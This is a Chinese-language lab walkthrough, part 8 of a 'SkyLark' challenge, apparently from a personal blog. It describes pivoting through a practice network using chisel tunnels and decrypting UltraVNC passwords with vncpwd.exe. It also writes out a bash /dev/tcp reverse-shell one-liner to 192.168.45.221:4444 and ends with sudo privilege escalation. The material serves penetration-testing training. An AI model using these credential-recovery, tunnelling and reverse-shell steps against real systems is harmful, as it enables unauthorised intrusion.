Challenge 3 - SkyLark(8)
Challenge 3 - SkyLark(8)
下一台選定內網的 .10
透過外網 .220 開啟 RDP 後,安裝 Port Scan UI 軟體掃掃看
10.10.184.10 有開兩個 Port 22 & 5901
chisel mapping 22 Port 到 2222 Port 後使用現有的帳號密碼爆破
結果沒有任何發現
最後在 .220 的 C:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini 檔案發現兩組密碼
passwd=BFE825DE515A335BE3
passwd2=59A04800B111ADB060
查看相關 VNC 說明,發現在檔案中的密碼是經過金鑰加密的
因為密碼在檔案中是經過加密的
參考 https://whatsoftware.com/crack-or-decrypt-vnc-server-encrypted-password/
下載 vncpwd.exe,參考 https://whatsoftware.com/download/did/232/
直接載入到 .220 上去執行
.\vncpwd.exe BFE825DE515A335BE3 & .\vncpwd.exe 59A04800B111ADB060
獲得密碼 R3S3+rcH & ABCDEFGH
將 10.10.172.10 5901 Port mapping 到 kali 5901 Port
然後直接 └─$ vncviewer 127.0.0.1::5901 輸入密碼 R3S3+rcH 就進去 10 了
先拿取 local.txt,看來這個帳號沒有 root 權限,還要 PE
VNC 太難用了,使用 bash -c "bash -i >& /dev/tcp/192.168.45.221/4444 0>&1" 與 chisel
搭建一個 Reverse Shell 回到 kali
這一台有兩隻腳,發現了 LAB 中的 10.20.172.0/24 網段
看來要進入 10.20.xxx.0/24 是透過這一台進去,先放著晚點再來看
cat /etc/passwd
帳號 research、development
sudo -l
參考 GTFO ip 指令
照著做就 root 了,順便拿 flag
更新攻擊列表
留言
張貼留言